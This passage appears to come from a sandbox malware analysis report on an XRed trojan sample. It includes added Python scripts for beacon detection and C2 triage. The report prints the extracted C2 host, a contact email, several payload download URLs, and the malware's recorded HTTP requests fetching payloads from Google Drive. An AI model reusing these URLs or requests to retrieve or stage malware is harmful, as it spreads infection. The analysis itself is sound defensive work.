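    ("2024-12-30T11:25:24.986489+01:00", 49726, "216.58.206.46", 443, 2044887),
    ("2024-12-30T11:25:25.013805+01:00", 49727, "216.58.206.46", 443, 2044887),
    # sid 2832617: a single HTTP request to 69.42.215.252:80
    ("2024-12-30T11:25:22.585705+01:00", 49714, "69.42.215.252", 80, 2832617),
    # sids 2822116 and 2849885 both fire on the 172.111.138.100:5552 sessions
    ("2024-12-30T11:25:24.118958+01:00", 49729, "172.111.138.100", 5552, 2822116),
    ("2024-12-30T11:26:09.772081+01:00", 49808, "172.111.138.100", 5552, 2822116),
    ("2024-12-30T11:26:46.015797+01:00", 49962, "172.111.138.100", 5552, 2822116),
    ("2024-12-30T11:25:24.118958+01:00", 49729, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:25:33.601726+01:00", 49786, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:25:42.653846+01:00", 49802, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:25:51.662498+01:00", 49805, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:00.695939+01:00", 49806, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:09.772081+01:00", 49808, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:18.834904+01:00", 49809, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:27.913134+01:00", 49838, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:36.944363+01:00", 49903, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:46.015797+01:00", 49962, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:26:59.990974+01:00", 50055, "172.111.138.100", 5552, 2849885),
    ("2024-12-30T11:27:09.023215+01:00", 50084, "172.111.138.100", 5552, 2849885),
]


def inter_arrival(times: List[datetime]) -> List[float]:
    """Seconds between consecutive connection times, in chronological order."""
    times = sorted(times)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def periodicity(deltas: List[float]) -> Tuple[float, float]:
    """Return (median interval, MAD / median).

    The median absolute deviation shrugs off one long gap (a missed or delayed
    beacon); a standard deviation would be dominated by it.
    """
    med = median(deltas)
    mad = median(abs(d - med) for d in deltas)
    return med, (mad / med if med > 0 else float("inf"))


def find_beacons(alerts: List[Tuple[str, int, str, int, int]],
                 min_connections: int = 5,
                 max_mad_ratio: float = 0.1) -> Dict[Tuple[str, int], float]:
    """Map each periodic (dest_ip, dest_port) to its median interval in seconds."""
    per_dest: Dict[Tuple[str, int], Set[datetime]] = defaultdict(set)
    for ts, _src_port, dest_ip, dest_port, _sid in alerts:
        # A set collapses several rules alerting on the same connection.
        per_dest[(dest_ip, dest_port)].add(datetime.fromisoformat(ts))
    beacons: Dict[Tuple[str, int], float] = {}
    for dest, times in per_dest.items():
        if len(times) < min_connections:
            continue
        med, ratio = periodicity(inter_arrival(list(times)))
        if ratio <= max_mad_ratio:
            beacons[dest] = round(med, 3)
    return beacons


if __name__ == "__main__":
    for (ip, port), interval in find_beacons(ALERTS).items():
        print(f"{ip}:{port} beacons every ~{interval}s")
```

On this data only 172.111.138.100:5552 is reported, with a median interval of 9.063 seconds; the 13.975-second gap before the 11:26:59 connection barely moves the MAD. The paired TLS connections to 216.58.206.46 alternate between millisecond and one-second gaps and fail the spread test, and the single HTTP request to 69.42.215.252 never reaches the minimum count. In production the same function runs over eve.json flow or alert records, where the destination grouping should also include the source host.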

                              AV Detection

Source: Machine-PO.exe | Avira: detected
Source: http://xred.site50.net/syn/SSLLibrary.dl | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCX7868.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX7868.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs | Avira: detection malicious, Label: VBS/Runner.VPJI
Source: Machine-PO.exe | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX7868.tmp | ReversingLabs: Detection: 91%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | ReversingLabs: Detection: 91%
Source: Machine-PO.exe | Virustotal: Detection: 85%
Source: Machine-PO.exe | ReversingLabs: Detection: 92%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX7868.tmp | Joe Sandbox ML: detected
Source: Machine-PO.exe | Joe Sandbox ML: detected
Source: Machine-PO.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49776 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49789 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49791 version: TLS 1.2
Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00252044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00252044
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0025219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0025219F
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_002524A9
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00246B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 10_2_00246B3F
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00246E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 10_2_00246E4A
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0024F350
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024FD47 FindFirstFileW,FindClose, 10_2_0024FD47
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0021DD92 GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0021DD92
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0024FDD2
Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 70MB

Networking

Source: Network traffic | Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8 -> 172.111.138.100:5552 (source ports 49729, 49808, 49962)
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8 -> 172.111.138.100:5552 (source ports 49729, 49786, 49802, 49805, 49806, 49808, 49809, 49838, 49903, 49962, 50055, 50084)
Source: Network traffic | Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49714 -> 69.42.215.252:80
Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8 -> 216.58.206.46:443 (source ports 49709, 49710, 49713, 49715, 49719, 49720, 49726, 49727, 49739, 49740, 49745, 49747, 49750, 49751, 49754, 49756, 49762, 49768, 49769)
Source: Malware configuration extractor | URLs: xred.mooo.com
Source: unknown | DNS query: name: freedns.afraid.org
Source: Joe Sandbox View | IP Address: 172.111.138.100
Source: Joe Sandbox View | IP Address: 69.42.215.252
Source: Joe Sandbox View | ASN Name: VOXILITYGB
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100 (50 connections reported)
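The alerts and direct-IP connections above, aggregated per destination socket. This is an added example, not part of the Joe Sandbox report or of the sample: it parses a constructed subset of the entries listed in this section (with the Source and description columns separated by ' | ' as rendered here) and marks a destination as a C2 candidate when it is hit by several distinct flows without any preceding DNS query. One caveat worth keeping in mind: the Emerging Threats signature names (Loda Logger, AndroidOS Agent.rz, Snake Keylogger) describe traffic patterns matched on the wire, not the family; the attribution on this page comes from the Yara match and the configuration extractor (XRed, xred.mooo.com).

```python
"""Aggregate the Suricata alerts and no-DNS TCP connections from Joe Sandbox
'Networking' entries into a per-destination C2 summary."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed sample: a subset of the entries listed above, with the Source and
# description columns separated by ' | ' as in this section's rendering.
SAMPLE = """\
Source: Network traffic | Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49729 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49729 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49714 -> 69.42.215.252:80
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49805 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49709 -> 216.58.206.46:443
Source: unknown | DNS query: name: freedns.afraid.org
Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
"""

ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
NODNS_RE = re.compile(r"TCP traffic detected without corresponding DNS query: (?P<dst>[\d.]+)$")
DNS_RE = re.compile(r"DNS query: name: (?P<name>\S+)$")


@dataclass
class Alert:
    sid: int
    severity: int
    msg: str
    src_port: int
    dst: str
    dst_port: int


@dataclass
class Destination:
    sids: set = field(default_factory=set)
    msgs: set = field(default_factory=set)
    flows: set = field(default_factory=set)   # distinct source ports = distinct connections
    direct_ip: bool = False                   # contacted without a preceding DNS lookup


def parse_entries(text):
    """Split each entry into Source/description and pick out the three entry kinds used here."""
    alerts, nodns, dns_names = [], Counter(), set()
    for line in text.splitlines():
        desc = line.split(" | ", 1)[-1].strip()
        if m := ALERT_RE.search(desc):
            alerts.append(Alert(int(m["sid"]), int(m["sev"]), m["msg"],
                                int(m["sport"]), m["dst"], int(m["dport"])))
        elif m := NODNS_RE.search(desc):
            nodns[m["dst"]] += 1
        elif m := DNS_RE.search(desc):
            dns_names.add(m["name"])
    return alerts, nodns, dns_names


def summarize(alerts, nodns):
    """Group alerts by destination socket.  A destination hit by several distinct
    flows that was never resolved through DNS is a hard-coded C2 candidate."""
    by_dst = defaultdict(Destination)
    for a in alerts:
        d = by_dst[f"{a.dst}:{a.dst_port}"]
        d.sids.add(a.sid)
        d.msgs.add(a.msg)
        d.flows.add(a.src_port)
    for key, d in by_dst.items():
        d.direct_ip = nodns[key.rsplit(":", 1)[0]] > 0
    return dict(by_dst)


def c2_candidates(summary, min_flows=2):
    """Destinations with repeated flows and no DNS resolution, i.e. a beaconing C2 socket."""
    return sorted(k for k, d in summary.items() if d.direct_ip and len(d.flows) >= min_flows)


if __name__ == "__main__":
    alerts, nodns, dns_names = parse_entries(SAMPLE)
    summary = summarize(alerts, nodns)
    for key, d in summary.items():
        print(key, sorted(d.sids), len(d.flows), "direct-IP" if d.direct_ip else "resolved")
    print("C2 candidates:", c2_candidates(summary))
```

On the constructed sample the only candidate is 172.111.138.100:5552, which carries two different signatures over two flows and was never looked up in DNS; 216.58.206.46:443 (Google, the Drive download) and 69.42.215.252:80 each appear on one flow and are not flagged, which is the distinction a triage script should make before IPs go into a blocklist.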
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0025550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected (19 requests):
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (4 requests):
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (2 requests):
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
Source: global traffic | HTTP traffic detected (17 requests):
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
Source: global traffic | HTTP traffic detected (2 requests):
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
Source: global traffic | HTTP traffic detected (10 requests):
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
Source: global traffic | HTTP traffic detected:
    GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: googlevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                              Source: global traffic
                              DNS traffic detected: DNS query: docs.google.com

                              Source: global traffic
                              DNS traffic detected: DNS query: xred.mooo.com

                              Source: global traffic
                              DNS traffic detected: DNS query: freedns.afraid.org

                              Source: global traffic
                              DNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5vTJUCokayzFTP24RzbZ2wteZ20PKJV_fGCGsI5ZKibDC2htAkWmYVejsRudU-tovVt7UR7xoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:22 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-DRrxHvSvU9zHAJbbqvNwNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cf_z3n1BDw5Qh2EQBJ6xGeU9lY2ZnDnd9NoVOrZ2ifvRAgR3vDZ3FmsLVjttN80L2fwCH26IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:23 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TozIE_lRoF7EJIy03p7EsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65RFh1stQNMiWIKh7_BpboglpkHG_1DoAe_alA7r-4gAEOC-RSWDLn-gSgoAvavu2lContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:23 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jgpIe8FgLX5jhY9N1ESzww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=czYKQNpmbF8xhuE9ZZDngEfj9m1plovuJoyYjU4EiuE7tB9lL3Ilgxr-sn4Dib-PWEZ9YWy50kXcemjbyFsb5aD_4_PqJ_3F8VXnWk6W97rzmOV6c3a2MV332Ws7W0FyyqYnxD0COjJAzIn8kudCVQSzBa-LyX2gBLUCkSs92aCB3ytVv5R_nNg; expires=Tue, 01-Jul-2025 10:25:23 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; 